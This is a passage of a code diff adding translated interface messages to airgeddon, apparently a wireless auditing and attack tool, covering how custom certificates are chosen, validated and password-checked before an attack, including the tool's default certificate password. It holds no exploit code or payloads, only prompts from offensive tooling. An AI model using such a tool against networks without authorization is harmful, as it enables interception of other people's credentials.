${green_color}Voulez-vous les utiliser pendant l'attaque? ${normal_color}${visual_choice}" + arr["CATALAN",646]="${blue_color}airgeddon ha detectat que han estat generats uns certificats personalitzats durant aquesta sessió. ${green_color}Vols utilitzar-los durant l'atac? ${normal_color}${visual_choice}" + arr["PORTUGUESE",646]="${blue_color}airgeddon detectou que certificados personalizados foram gerados durante esta sessão. ${green_color}Você quer usá-los durante o ataque? ${normal_color}${visual_choice}" + arr["RUSSIAN",646]="${blue_color}airgeddon обнаружил, что пользовательские сертификаты были созданы во время этого сеанса. ${green_color}вы хотите использовать их во время атаки? ${normal_color}${visual_choice}" + arr["GREEK",646]="${pending_of_translation} ${blue_color}το airgeddon έχει εντοπίσει ότι έχουν δημιουργηθεί προσαρμοσμένα πιστοποιητικά κατά τη διάρκεια αυτής της περιόδου σύνδεσης. ${green_color}θέλετε να τα χρησιμοποιήσετε κατά τη διάρκεια της επίθεσης; ${normal_color} ${visual_choice}" + arr["ITALIAN",646]="${pending_of_translation} ${blue_color}airgeddon ha rilevato che durante questa sessione sono stati generati certificati personalizzati. ${green_color}Vuoi usarli durante l'attacco? ${normal_color}${visual_choice}" + arr["POLISH",646]="${pending_of_translation} ${blue_color}airgeddon wykrył, że podczas tej sesji wygenerowano niestandardowe certyfikaty. ${green_color}Czy chcesz ich użyć podczas ataku? ${normal_color}${visual_choice}" + arr["GERMAN",646]="${blue_color}airgeddon hat bemerkt, dass während dieser Sitzung benutzerdefinierte Zertifikate generiert wurden. ${green_color}Möchten Sie diese während des Angriffs benutzen? ${normal_color}${visual_choice}" + arr["TURKISH",646]="${blue_color}airgeddon, bu oturum sırasında özel sertifikaların oluşturulduğunu tespit etti. ${green_color}Onları saldırı sırasında kullanmak istiyor musunuz? ${normal_color}${visual_choice}" + + arr["ENGLISH",647]="Default certificates will be used" + arr["SPANISH",647]="Se utilizarán los certificados por defecto" + arr["FRENCH",647]="Les certificats par défaut seront utilisés" + arr["CATALAN",647]="S'utilitzaran els certificats per defecte" + arr["PORTUGUESE",647]="O certificado padrão será usado" + arr["RUSSIAN",647]="Будут использоваться дефолтные сертификаты" + arr["GREEK",647]="${pending_of_translation} θα χρησιμοποιηθούν τα προεπιλεγμένα πιστοποιητικά" + arr["ITALIAN",647]="${pending_of_translation} Verranno utilizzati i certificati predefiniti" + arr["POLISH",647]="${pending_of_translation} Zostaną użyte domyślne certyfikaty" + arr["GERMAN",647]="Die Standardzertifikate werden verwendet" + arr["TURKISH",647]="Varsayılan sertifikalar kullanılacak" + + arr["ENGLISH",648]="Previously generated by airgeddon certificates will be used" + arr["SPANISH",648]="Se utilizarán los certificados generados anteriormente con airgeddon" + arr["FRENCH",648]="Les certificats avant générés avec airgeddon seront utilisés" + arr["CATALAN",648]="S'utilitzaran els certificats generats anteriorment amb airgeddon" + arr["PORTUGUESE",648]="Os certificados previamente gerados com airgeddon serão usados" + arr["RUSSIAN",648]="Будут использованы сертификаты, сгенерированные с airgeddon" + arr["GREEK",648]="${pending_of_translation} θα χρησιμοποιηθούν προηγούμενα πιστοποιητικά με airgeddon" + arr["ITALIAN",648]="${pending_of_translation} Verranno utilizzati i certificati generati in precedenza con airgeddon" + arr["POLISH",648]="${pending_of_translation} Zostaną wykorzystane wcześniej wygenerowane certyfikaty z airgeddon" + arr["GERMAN",648]="Mit airgeddon erstellte Zertifikate werden verwendet" + arr["TURKISH",648]="Daha önce airgeddon ile üretilen sertifikalar kullanılacak" + + arr["ENGLISH",649]="Validating certificates..." + arr["SPANISH",649]="Validando certificados..." + arr["FRENCH",649]="Validation des certificats..." + arr["CATALAN",649]="Validant certificats..." + arr["PORTUGUESE",649]="Validando certificados..." + arr["RUSSIAN",649]="Проверка сертификатов..." + arr["GREEK",649]="${pending_of_translation} Επικύρωση πιστοποιητικών..." + arr["ITALIAN",649]="${pending_of_translation} Convalida dei certificati..." + arr["POLISH",649]="${pending_of_translation} Sprawdzanie poprawności certyfikatów..." + arr["GERMAN",649]="Validiere Zertfikiate..." + arr["TURKISH",649]="Sertifikalar doğrulanıyor..." + + arr["ENGLISH",650]="Certificates are valid. Attack can be performed" + arr["SPANISH",650]="Los certificados son válidos. El ataque se puede realizar" + arr["FRENCH",650]="Les certificats sont valides. L'attaque peut être lancée" + arr["CATALAN",650]="Els certificats són vàlids. L'atac es pot realitzar" + arr["PORTUGUESE",650]="Os certificados são válidos. O ataque pode ser realizado" + arr["RUSSIAN",650]="Сертификаты действительны. Можно выполнить атаку" + arr["GREEK",650]="${pending_of_translation} Τα πιστοποιητικά είναι έγκυρα. Μπορεί να γίνει επίθεση" + arr["ITALIAN",650]="${pending_of_translation} I certificati sono validi. L'attacco può essere eseguito" + arr["POLISH",650]="${pending_of_translation} Certyfikaty są ważne. Można wykonać atak" + arr["GERMAN",650]="Die Zertifikate sind gültig. Der Angriff kann ausgeführt werden" + arr["TURKISH",650]="Sertifikalar geçerli. Saldırı yapılabilir" + + arr["ENGLISH",651]="There is a problem with the files or the entered path. Make sure that ca.pem, server.pem and server.key files exist in the given path. The attack can't be performed" + arr["SPANISH",651]="Existe un problema con los ficheros o la ruta introducida. Asegúrate de que los ficheros ca.pem, server.pem y server.key existen en la ruta indicada. El ataque no se puede realizar" + arr["FRENCH",651]="Il y a un problème avec les fichiers ou le chemin entré. Assurez-vous que les fichiers ca.pem, server.pem et server.key existent dans le chemin indiqué. L'attaque ne peut pas être effectuée" + arr["CATALAN",651]="Hi ha un problema amb els fitxers o la ruta introduïda. assegura't que els fitxers ca.pem, server.pem i server.key existeixen a la ruta indicada. L'atac no es pot realitzar" + arr["PORTUGUESE",651]="Existe um problema com os arquivos ou com o caminho digitado. Certifique-se de que os arquivos ca.pem, server.pem e server.key existam no caminho indicado. O ataque não pode ser realizado" + arr["RUSSIAN",651]="Возникла проблема с файлами или указанным путём. Убедитесь, что файлы ca.pem, server.pem и server.key существуют по указанному пути. Атака не может быть выполнена" + arr["GREEK",651]="${pending_of_translation} Υπάρχει κάποιο πρόβλημα με τα αρχεία ή τη διαδρομή που έχετε εισαγάγει. βεβαιωθείτε ότι τα αρχεία ca.pem, server.pem και server.key υπάρχουν στην υποδεικνυόμενη διαδρομή. η επίθεση δεν μπορεί να εκτελεστεί" + arr["ITALIAN",651]="${pending_of_translation} Si è verificato un problema con i file o il percorso immessi. assicurarsi che i file ca.pem, server.pem e server.key esistano nel percorso indicato. L'attacco non può essere eseguito" + arr["POLISH",651]="${pending_of_translation} Wystąpił problem z wprowadzonymi plikami lub ścieżką. upewnij się, że pliki ca.pem, server.pem i server.key istnieją we wskazanej ścieżce. nie można wykonać ataku" + arr["GERMAN",651]="Es gibt ein Problem mit den Dateien oder dem eingegebenen Pfad. Stellen Sie sicher, dass die Dateien ca.pem, server.pem und server.key im angegebenen Pfad vorhanden sind. Der Angriff kann nicht ausgeführt werden" + arr["TURKISH",651]="Dosyalarda veya girilen yolda bir sorun var. ca.pem, server.pem ve server.key dosyalarının belirtilen yolda bulunduğundan emin olun. Saldırı gerçekleştirilemez" + + arr["ENGLISH",652]="Certificates are invalid or the password is wrong, so the attack can't be performed" + arr["SPANISH",652]="Los certificados no son válidos o la contraseña es errónea, por lo que el ataque no se puede realizar" + arr["FRENCH",652]="Les certificats ne sont pas valides ou le mot de passe est incorrect, donc l'attaque ne peut pas être effectuée" + arr["CATALAN",652]="Els certificats no són vàlids o la contrasenya és errònia, per la qual cosa l'atac no es pot realitzar" + arr["PORTUGUESE",652]="Os certificados são inválidos ou a senha está incorreta, o ataque não pode ser realizado" + arr["RUSSIAN",652]="Сертификаты недействительны или неверный пароль, поэтому атака не может быть выполнена" + arr["GREEK",652]="${pending_of_translation} Τα πιστοποιητικά δεν είναι έγκυρα ή ο κωδικός πρόσβασης είναι λάθος, έτσι η επίθεση δεν μπορεί να εκτελεστεί" + arr["ITALIAN",652]="${pending_of_translation} I certificati non sono validi o la password è errata, quindi l'attacco non può essere eseguito" + arr["POLISH",652]="${pending_of_translation} Certyfikaty są nieprawidłowe lub hasło jest nieprawidłowe, więc atak nie może zostać wykonany" + arr["GERMAN",652]="Die Zertifikate sind nicht gültig oder das Passwort ist falsch, der Angriff kann also nicht ausgeführt werden" + arr["TURKISH",652]="Sertifikalar geçersiz veya şifre yanlış, bu yüzden saldırı gerçekleştirilemez" + + arr["ENGLISH",653]="Enter the directory path where the certificates files are located. ${blue_color}Make sure that the ca.pem, server.pem and server.key files exist in the given path:" + arr["SPANISH",653]="Introduce la ruta del directorio donde se encuentran los ficheros de los certificados. ${blue_color}Asegúrate de que los ficheros ca.pem, server.pem y server.key existen en la ruta indicada:" + arr["FRENCH",653]="Entrez le chemin du répertoire dans lequel se trouvent les fichiers du certificats. ${blue_color}Assurez-vous que les fichiers ca.pem, server.pem et server.key existent dans le chemin indiqué:" + arr["CATALAN",653]="Introdueix la ruta del directori on es troben els fitxers dels certificats. ${blue_color}Assegura't que els fitxers ca.pem, server.pem i server.key existeixen a la ruta indicada:" + arr["PORTUGUESE",653]="Digite o caminho do diretório onde os arquivos de certificado estão localizados. ${blue_color}Certifique-se de que os arquivos ca.pem, server.pem e server.key existam no caminho indicado:" + arr["RUSSIAN",653]="Введите путь к каталогу, в котором находятся файлы сертификатов. ${blue_color}Убедитесь, что файлы ca.pem, server.pem и server.key существуют по указанному пути:" + arr["GREEK",653]="${pending_of_translation} Εισαγάγετε τη διαδρομή καταλόγου όπου βρίσκονται τα αρχεία πιστοποιητικών. ${blue_color}βεβαιωθείτε ότι τα αρχεία ca.pem, server.pem και server.key υπάρχουν στην υποδεικνυόμενη διαδρομή:" + arr["ITALIAN",653]="${pending_of_translation} Immettere il percorso della directory in cui si trovano i file del certificato. ${blue_color}Assicurati che i file ca.pem, server.pem e server.key esistano nel percorso indicato:" + arr["POLISH",653]="${pending_of_translation} Wprowadź ścieżkę do katalogu, w którym znajdują się pliki certyfikatów. ${blue_color}Upewnij się, że pliki ca.pem, server.pem i server.key istnieją we wskazanej ścieżce:" + arr["GERMAN",653]="Geben sie den Verzeichnispfad ein, in dem sich die Zertifikatdateien befinden. ${blue_color}Stellen Sie sicher, dass die Dateien ca.pem, server.pem und server.key im angegebenen Pfad vorhanden sind:" + arr["TURKISH",653]="Sertifika dosyalarının bulunduğu dizin yolunu girin. ${blue_color}ca.pem, server.pem ve server.key dosyalarının belirtilen yolda bulunduğundan emin olun:" + + arr["ENGLISH",654]="Enter the password used during the creation of the certificate files. ${blue_color}Remember that if they were generated using airgeddon, the used password was ${normal_color}\"airgeddon\"${blue_color}:" + arr["SPANISH",654]="Introduce la contraseña utilizada en la creación de los ficheros de los certificados. ${blue_color}Recuerda que si fueron generados con airgeddon, la contraseña que se utilizó fue ${normal_color}\"airgeddon\"${blue_color}:" + arr["FRENCH",654]="Entrez le mot de passe utilisé lors de la création des fichiers du certificats. ${blue_color}N'oubliez pas que s'ils ont été générés avec airgeddon, le mot de passe utilisé était ${normal_color}\"airgeddon\"${blue_color}:" + arr["CATALAN",654]="Introdueix la contrasenya utilitzada en la creació dels fitxers dels certificats. ${blue_color}Recorda que si van ser generats amb airgeddon, la contrasenya que es va utilitzar va ser ${normal_color}\"airgeddon\"${blue_color}:" + arr["PORTUGUESE",654]="Digite a senha usada na criação dos arquivos de certificado. ${blue_color}Lembre-se de que, se eles foram gerados com airgeddon, a senha usada foi ${normal_color}\"airgeddon\"${blue_color}:" + arr["RUSSIAN",654]="Введите пароль, использованный при создании файлов сертификата. ${blue_color}Помните, что если они были созданы с помощью airgeddon, то использовался пароль ${normal_color}\"airgeddon\"${blue_color}:" + arr["GREEK",654]="${pending_of_translation} Καταχωρίστε τον κωδικό πρόσβασης που χρησιμοποιείται στη δημιουργία των αρχείων πιστοποιητικών. ${blue_color}Να θυμάστε ότι αν δημιουργήθηκαν με airgeddon, ο κωδικός που χρησιμοποιήθηκε ήταν ${normal_color}\"airgeddon\"${blue_color}:" + arr["ITALIAN",654]="${pending_of_translation} Immettere la password utilizzata nella creazione dei file del certificato. ${blue_color}Ricorda che se sono stati generati con airgeddon, la password che è stata utilizzata era ${normal_color}\"airgeddon\"${blue_color}:" + arr["POLISH",654]="${pending_of_translation} Wprowadź hasło użyte przy tworzeniu plików certyfikatów. ${blue_color}Pamiętaj, że jeśli zostały wygenerowane za pomocą airgeddon, użyte hasło to ${normal_color}\"airgeddon\"${blue_color}:" + arr["GERMAN",654]="Geben sie das Kennwort ein, das bei der Erstellung der Zertifikatdateien verwendet wurde. ${blue_color}Vergessen Sie nicht, dass das verwendete Passwort ${normal_color}\"airgeddon\"${blue_color} lautet, wenn sie mit airgeddon generiert wurden:" + arr["TURKISH",654]="Sertifika dosyalarının oluşturulmasında kullanılan şifreyi girin. ${blue_color}Unutmayın ki bunlar airgeddon ile oluşturulduysa, ${normal_color}\"airgeddon\"${blue_color} kullanılan parolaydı:" case "${3}" in "yellow") diff --git a/pindb_checksum.txt b/pindb_checksum.txt index 957c423c3..c0ba164a5 100644 --- a/pindb_checksum.txt +++ b/pindb_checksum.txt @@ -1 +1 @@ -37a176e9a0eaedb7de1f06b98143bee2 +fd6a20d9da6a497dffe68898ce385fcc